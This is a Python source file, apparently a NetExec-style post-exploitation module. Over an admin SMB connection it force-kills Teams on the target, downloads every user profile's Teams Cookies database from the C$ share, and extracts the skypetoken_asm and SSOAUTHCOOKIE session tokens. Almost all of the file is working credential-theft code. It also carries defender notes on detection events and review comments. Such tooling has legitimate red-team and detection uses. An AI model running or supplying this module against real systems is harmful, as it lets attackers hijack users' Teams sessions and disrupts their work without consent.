#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sqlite3
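class NXCModule:
    """Framework module that reads Microsoft Teams cookies over SMB.

    For every profile folder found under ``C$\\Users`` the module downloads
    ``AppData/Roaming/Microsoft/Teams/Cookies`` (an SQLite database) and logs
    the ``skypetoken_asm`` and ``SSOAUTHCOOKIE`` values stored in it.

    Defender notes: the module first force-terminates ``teams.exe`` and then
    reads the Cookies file of each profile through the ``C$`` share. Both steps
    are observable on the target where process-creation auditing (Windows
    Security event 4688) and detailed file-share auditing (event 5145) are
    enabled; an unexpected forced Teams shutdown followed by remote reads of
    that file across several profiles is a useful correlation.
    """

    name = "teams_localdb"
    description = "Retrieves the cleartext ssoauthcookie from the local Microsoft Teams database, if teams is open we kill all Teams process"
    supported_protocols = ["smb"]
    # NOTE(review): on_admin_login force-kills every teams.exe on the target,
    # which the logged-on user will notice. Confirm that this matches what the
    # framework means by "opsec_safe"; the value is left unchanged here.
    opsec_safe = True
    multiple_hosts = False

    def options(self, context, module_options):
        """This module takes no options."""

    def on_admin_login(self, context, connection):
        """Download each profile's Teams Cookies database and log its tokens.

        Args:
            context: Framework context; only ``context.log`` is used.
            connection: Framework SMB connection; ``execute``, ``spider`` and
                ``conn.getFile`` are used.

        The downloaded database holds live session tokens, so it is staged in
        a private temporary directory that is deleted on exit, instead of the
        fixed, predictable path ``/tmp/teams_cookies2.txt`` used before.
        """
        import os
        import tempfile

        context.log.display("Killing all Teams process to open the cookie file")
        # Teams keeps the Cookies file open; while it runs the download fails
        # with STATUS_SHARING_VIOLATION (handled below).
        connection.execute("taskkill /F /T /IM teams.exe")
        # sleep(3)
        found = 0
        paths = connection.spider("C$", folder="Users", regex=["[a-zA-Z0-9]*"], depth=0)
        with tempfile.TemporaryDirectory() as work_dir:
            db_path = os.path.join(work_dir, "Cookies")
            with open(db_path, "wb") as f:
                for path in paths:
                    try:
                        connection.conn.getFile("C$", path + "/AppData/Roaming/Microsoft/Teams/Cookies", f.write)
                        # parse_file opens the file by name, so buffered bytes
                        # must be on disk before it runs.
                        f.flush()
                        context.log.highlight("Found Cookie file in path " + path)
                        found = 1
                        self.parse_file(context, "skypetoken_asm", db_path)
                        self.parse_file(context, "SSOAUTHCOOKIE", db_path)
                    except Exception as e:
                        if "STATUS_SHARING_VIOLATION" in str(e):
                            context.log.debug(str(e))
                            context.log.highlight("Found Cookie file in path " + path)
                            context.log.fail("Cannot retrieve file, most likely Teams is running which prevents us from retrieving the Cookies database")
                        else:
                            # Profiles without Teams end up here; keep it quiet
                            # but do not discard the reason entirely.
                            context.log.debug(str(e))
                    finally:
                        # Reset the staging file so one profile's data (or a
                        # partial download) never mixes with the next one.
                        # The original called the misspelled f.trunkate(), whose
                        # AttributeError was swallowed by the except above.
                        f.seek(0)
                        f.truncate()
        if found == 0:
            context.log.display("No cookie file found in Users folder")

    @staticmethod
    def parse_file(context, name, db_path="/tmp/teams_cookies2.txt"):
        """Log the value of cookie *name* from the SQLite database at *db_path*.

        Args:
            context: Framework context; only ``context.log`` is used.
            name: Cookie name to look up in the ``cookies`` table.
            db_path: Database file to open. The default is the path the
                original implementation hard-coded, kept for existing callers.

        Any exception is reported through ``context.log.fail`` rather than
        raised.
        """
        try:
            conn = sqlite3.connect(db_path)
            try:
                # Bound parameter instead of string concatenation, so a quote
                # in `name` cannot alter the statement.
                row = conn.execute("SELECT value FROM cookies WHERE name = ?", (name,)).fetchone()
            finally:
                # Close the handle even when the query fails.
                conn.close()
            if row is None:
                context.log.fail("No " + name + " present in Microsoft Teams Cookies database")
            else:
                context.log.success("Succesfully extracted " + name + ": ")
                context.log.success(row[0])
        except Exception as e:
            context.log.fail(str(e))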